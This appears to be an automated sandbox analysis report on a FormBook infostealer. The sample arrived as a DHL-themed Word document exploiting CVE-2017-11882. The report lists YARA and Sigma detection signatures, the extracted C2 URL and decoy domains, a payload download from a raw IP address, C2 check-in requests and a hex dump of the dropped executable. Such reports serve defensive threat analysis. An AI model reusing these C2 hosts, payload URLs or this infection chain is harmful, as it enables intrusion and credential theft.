6.0.hkdf.exe.400000.9.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15ce9:$sqlite3step: 68 34 1C 7B E1 0x15dfc:$sqlite3step: 68 34 1C 7B E1 0x15d18:$sqlite3text: 68 38 2A 90 C5 0x15e3d:$sqlite3text: 68 38 2A 90 C5 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
4.2.hkdf.exe.39d8b40.4.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.hkdf.exe.39d8b40.4.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x429478:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x429812:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x435525:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x435011:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x435627:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x43579f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x42a22a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x43428c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x42afa2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x43aa17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x43baca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.hkdf.exe.39d8b40.4.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x437949:$sqlite3step: 68 34 1C 7B E1 0x437a5c:$sqlite3step: 68 34 1C 7B E1 0x437978:$sqlite3text: 68 38 2A 90 C5 0x437a9d:$sqlite3text: 68 38 2A 90 C5 0x43798b:$sqlite3blob: 68 53 D8 7F 8C 0x437ab3:$sqlite3blob: 68 53 D8 7F 8C
6.0.hkdf.exe.400000.7.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
6.0.hkdf.exe.400000.7.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.0.hkdf.exe.400000.7.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
4.2.hkdf.exe.3ce4180.5.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.hkdf.exe.3ce4180.5.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x11de38:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x11e1d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x129ee5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1299d1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x129fe7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x12a15f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x11ebea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x128c4c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x11f962:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x12f3d7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x13048a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.hkdf.exe.3ce4180.5.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x12c309:$sqlite3step: 68 34 1C 7B E1 0x12c41c:$sqlite3step: 68 34 1C 7B E1 0x12c338:$sqlite3text: 68 38 2A 90 C5 0x12c45d:$sqlite3text: 68 38 2A 90 C5 0x12c34b:$sqlite3blob: 68 53 D8 7F 8C 0x12c473:$sqlite3blob: 68 53 D8 7F 8C
6.0.hkdf.exe.400000.5.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
6.0.hkdf.exe.400000.5.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.0.hkdf.exe.400000.5.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15ce9:$sqlite3step: 68 34 1C 7B E1 0x15dfc:$sqlite3step: 68 34 1C 7B E1 0x15d18:$sqlite3text: 68 38 2A 90 C5 0x15e3d:$sqlite3text: 68 38 2A 90 C5 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
6.0.hkdf.exe.400000.7.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
Click to see the 20 entries

Sigma Overview

Exploits:

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2420, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\LaXgQ8hib9fwKQI[1].bat

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\hkdf.exe, CommandLine: C:\Users\user\AppData\Roaming\hkdf.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\hkdf.exe, NewProcessName: C:\Users\user\AppData\Roaming\hkdf.exe, OriginalFileName: C:\Users\user\AppData\Roaming\hkdf.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2420, ProcessCommandLine: C:\Users\user\AppData\Roaming\hkdf.exe, ProcessId: 3004

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000006.00000002.461713601.00000000003C0000.00000040.00020000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.multidetoxhepatico.com/b62n/"], "decoy": ["childzplanet.com", "nine8culture.com", "yourfoodmenu.com", "nxhxyzjy.com", "nobelies.com", "baetsupreme.net", "indiadiscountedfares.com", "iconnect-design.com", "durston.store", "sweetcreationsbyjp.com", "ktieman.com", "getvirtualaddress.com", "cryptopoly-figures.com", "minismi2.com", "ricemoment.com", "regionalhomescommercial.com", "onelike.biz", "d22.group", "kwissleapp.com", "cindyrandband.com", "wolfgap.com", "ilogic8.com", "digitize-vision.com", "qiunianns.com", "tejpalmeet.com", "joywalkerconsultingllc.com", "daudcoffee.com", "muktobangla.xyz", "tendenciaofertas.com", "xuongkhophoanghuong.pro", "circleofdeth.com", "spoilthemrottenpets.com", "innasamudra.com", "pizzadelta.com", "jcmsomedia.com", "applelost-support.info", "ridvanyilmaz.com", "catherinehaskins.com", "fogelsingleywedding.com", "suddennnnnnnnnnnn20.xyz", "3leadsaday.xyz", "xn--salihzzmrt-icb8ec.com", "rdaniels2.com", "xn--growbb-fvab.com", "badkyker.quest", "sdoook.com", "bagways.com", "bullseyefunrun.com", "ff4c2myy0.xyz", "stardustfuel.com", "yiyuanpai.net", "permaculturemd.com", "prospectly.cloud", "myonchain.art", "atlasconcretos.com", "ghost.immo", "kondanginyuk.online", "mohamedtaher.xyz", "sxsxnt.com", "sofiarust.xyz", "playmayka.com", "eemtyx.com", "tashamurphy.com", "akoya-kyoto.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: Dhl Waybill Document.doc	Virustotal: Detection: 28%			Perma Link
Source: Dhl Waybill Document.doc	ReversingLabs: Detection: 35%

Yara detected FormBook

Show sources

Source: Yara match	File source: 6.0.hkdf.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.hkdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.hkdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.hkdf.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.hkdf.exe.39d8b40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.hkdf.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.hkdf.exe.3ce4180.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.hkdf.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.hkdf.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.461713601.00000000003C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.674851184.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.421161795.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.674778890.0000000000130000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.446591124.00000000097EC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.421641009.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.425109708.00000000038F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.461663216.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.453880697.00000000097EC000.00000040.00020000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Show sources

Source: http://www.ff4c2myy0.xyz/b62n/?7ng=k0GpdJo86r2&VrxdA6JP=2z8/DFBk6RpWpVb2yB1064sDrPXSeSOfJo6AXswKq2sMG6ZpedajFkWvnUFPGoiFanmBYQ==	Avira URL Cloud: Label: phishing
Source: http://2.56.57.187/LaXgQ8hib9fwKQI.bat	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1BD043B5-1023-4485-A58F-D199003494BA}.tmp

Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen

Source: 6.2.hkdf.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.hkdf.exe.8d73c8.2.unpack	Avira: Label: TR/Dropper.Gen
Source: 6.0.hkdf.exe.400000.9.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.control.exe.e0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 8.2.control.exe.e0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 6.0.hkdf.exe.400000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.hkdf.exe.400000.7.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.hkdf.exe.430000.1.unpack	Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\hkdf.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\hkdf.exe			Jump to behavior

Source: ~WRF{1BD043B5-1023-4485-A58F-D199003494BA}.tmp.0.dr

Stream path '_1701084789/\x1CompObj' : ...........................F....Microsoft Equation

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: control.pdb source: hkdf.exe, 00000006.00000002.461953910.00000000008B9000.00000004.00000020.sdmp, hkdf.exe, 00000006.00000002.461764308.0000000000430000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdb source: hkdf.exe, hkdf.exe, 00000006.00000003.423197452.0000000000440000.00000004.00000001.sdmp, hkdf.exe, 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, hkdf.exe, 00000006.00000003.422167039.0000000000240000.00000004.00000001.sdmp, hkdf.exe, 00000006.00000002.462162594.0000000000B20000.00000040.00000001.sdmp, control.exe

Source: global traffic

DNS query: name: www.ridvanyilmaz.com

Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 4x nop then pop esi	6_2_00415854
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 4x nop then pop ebx	6_2_00406AB8
Source: C:\Windows\SysWOW64\control.exe	Code function: 4x nop then pop esi	8_2_00115854
Source: C:\Windows\SysWOW64\control.exe	Code function: 4x nop then pop ebx	8_2_00106ABA

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 2.56.57.187:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 2.56.57.187:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 109.71.253.24:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 109.71.253.24:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 109.71.253.24:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 147.124.221.147:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 147.124.221.147:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 147.124.221.147:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 75.2.60.5:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 75.2.60.5:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 75.2.60.5:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49174 -> 23.225.139.107:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49174 -> 23.225.139.107:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49174 -> 23.225.139.107:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 167.99.163.124 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.multidetoxhepatico.com
Source: C:\Windows\explorer.exe	Network Connect: 109.71.253.24 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.rdaniels2.com
Source: C:\Windows\explorer.exe	Domain query: www.ff4c2myy0.xyz
Source: C:\Windows\explorer.exe	Network Connect: 147.124.221.147 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 75.2.60.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.bagways.com
Source: C:\Windows\explorer.exe	Network Connect: 104.21.53.218 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.digitize-vision.com
Source: C:\Windows\explorer.exe	Network Connect: 3.19.116.195 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ktieman.com
Source: C:\Windows\explorer.exe	Network Connect: 23.225.139.107 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.daudcoffee.com
Source: C:\Windows\explorer.exe	Domain query: www.sdoook.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.atlasconcretos.com
Source: C:\Windows\explorer.exe	Domain query: www.xn--growbb-fvab.com
Source: C:\Windows\explorer.exe	Domain query: www.ridvanyilmaz.com

Performs DNS queries to domains with low reputation

Show sources

Source: C:\Windows\explorer.exe

DNS query: www.ff4c2myy0.xyz

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.multidetoxhepatico.com/b62n/

Source: Joe Sandbox View

ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS

Source: global traffic	HTTP traffic detected: GET /b62n/?7ng=k0GpdJo86r2&VrxdA6JP=CkbDaw0w78FnUUGmsS8khblO1m9LoxhjWgnULl67DqIIYbf1Mw49JamKO+kmV1m+rdKGzg== HTTP/1.1Host: www.ridvanyilmaz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b62n/?VrxdA6JP=pEQZAUdavhsqZJkN83QQx5vUzCZ7bVbXRO/iD/+E6RM5nTIKuIu5/L5eTQ9xaMo7/J5LQA==&7ng=k0GpdJo86r2 HTTP/1.1Host: www.atlasconcretos.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b62n/?VrxdA6JP=RV/S0wPXEG6CXRSSMKnov5Df6lzEYpgbtRkMDrTyCZrZsrYIsxb4Wyn5lCyUpYtxxVTqxA==&7ng=k0GpdJo86r2 HTTP/1.1Host: www.digitize-vision.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b62n/?7ng=k0GpdJo86r2&VrxdA6JP=Ry9//1u1KSBgvJVTMKtsoBLsTLEtS61U1s5lXOGkeFjYXUCmgqEi+s/kbRLZIKsosKg42g== HTTP/1.1Host: www.bagways.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b62n/?VrxdA6JP=4vMzR1O6TdRvdnjwNsxZKAWsXyEcarJE8V5Wgs9HzMhC/KpAuLZfktwaHjQNhKT+WAJJHA==&7ng=k0GpdJo86r2 HTTP/1.1Host: www.xn--growbb-fvab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b62n/?7ng=k0GpdJo86r2&VrxdA6JP=zigQYQl5UzFlMNnRx6FEMCOrGb7IataJR35zF0KDFEJa6c5GJb0linXPwXtb/lrtaJB0WA== HTTP/1.1Host: www.multidetoxhepatico.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b62n/?VrxdA6JP=IxnxMsk6Wllyu7aaf2DybOktFmU9HSWwHr0GL2zVz1catFUyroC1Dw2DbvezW0NZbbspDQ==&7ng=k0GpdJo86r2 HTTP/1.1Host: www.ktieman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b62n/?7ng=k0GpdJo86r2&VrxdA6JP=2z8/DFBk6RpWpVb2yB1064sDrPXSeSOfJo6AXswKq2sMG6ZpedajFkWvnUFPGoiFanmBYQ== HTTP/1.1Host: www.ff4c2myy0.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 23.225.139.107 23.225.139.107

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Dec 2021 13:47:52 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.13Last-Modified: Wed, 15 Dec 2021 05:29:13 GMTETag: "fe400-5d32896180bf6"Accept-Ranges: bytesContent-Length: 1041408Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 26 7d b9 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 d8 0f 00 00 0a 00 00 00 00 00 00 ae f6 0f 00 00 20 00 00 00 00 10 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 10 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 f6 0f 00 53 00 00 00 00 00 10 00 80 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 10 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 d6 0f 00 00 20 00 00 00 d8 0f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 80 06 00 00 00 00 10 00 00 08 00 00 00 da 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 10 00 00 02 00 00 00 e2 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 f6 0f 00 00 00 00 00 48 00 00 00 02 00 05 00 80 8a 0f 00 d8 6b 00 00 03 00 00 00 3e 00 00 06 68 ff 00 00 18 8b 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 01 00 00 00 01 00 00 11 2a 00 00 00 13 30 04 00 5b 00 00 00 01 00 00 11 02 14 7d 01 00 00 04 02 28 16 00 00 0a 20 08 a9 31 32 20 5e f5 35 26 61 25 0a 1a 5e 45 04 00 00 00 dc ff ff ff 22 00 00 00 02 00 00 00 12 00 00 00 2b 20 00 06 20 a9 04 94 23 5a 20 0b 09 08 5b 61 2b cf 00 06 20 89 97 33 6e 5a 20 a4 bc 41 05 61 2b bf 02 28 06 00 00 06 00 2a 00 13 30 04 00 58 01 00 00 01 00 00 11 02 14 7d 01 00 00 04 02 28 16 00 00 0a 20 f0 cb b1 5b 20 61 de 1f 0f 61 25 0a 1f 0c 5e 45 0c 00 00 00 e1 00 00 00 b6 00 00 00 26 00 00 00 05 00 00 00 5c 00 00 00 80 00 00 00 c9 00 00 00 bb ff ff ff 49 00 00 00 04 01 00 00 36 00 00 00 a3 00 00 00 38 ff 00 00 00 02 7b 0a 00 00 04 0e 04 28 17 00 00 0a 6f 18 00 00 0a 06 20 50 b4 16 32 5a 20 18 41 5b 92 61 2b 9a 00 06 20 aa 8d 05 b0 5a 20 16 4f 3a cc 61 2b 8a 00 06 20 95 eb dc 34 5a 20 4b c6 b6 2a 61 38 77 ff ff ff 00 06 20 7f 5c bd f9 5a

Source: global traffic

HTTP traffic detected: GET /LaXgQ8hib9fwKQI.bat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 2.56.57.187Connection: Keep-Alive

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Dec 2021 13:48:56 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Y1l53AotGcaBdB6ndd0Kg3%2FU1Nhm58nM7foSwt2bDRM6lh86euEL5eTagQby4tg0gjDnQCkuVS0Ev1fj0yJVc82y15BG%2BQgEPZlP%2FGSs7bC0QFiwRLHapNkzrodaEFYEFSMFRkSaeg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6be021e5dce20621-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 69 64 76 61 6e 79 69 6c 6d 61 7a 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 11a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.ridvanyilmaz.com Port 80</address></body></html>
